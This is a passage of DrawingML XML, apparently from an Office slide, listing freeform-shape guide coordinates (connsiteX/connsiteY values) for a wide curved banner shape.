              <a:gd name="connsiteY67" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY166"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287089 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 303891 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY165"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588044 w 12192000"/>
              <a:gd name="connsiteY13" fmla="*/ 110756 h 4939827"/>
              <a:gd name="connsiteX14" fmla="*/ 7732750 w 12192000"/>
              <a:gd name="connsiteY14" fmla="*/ 145456 h 4939827"/>
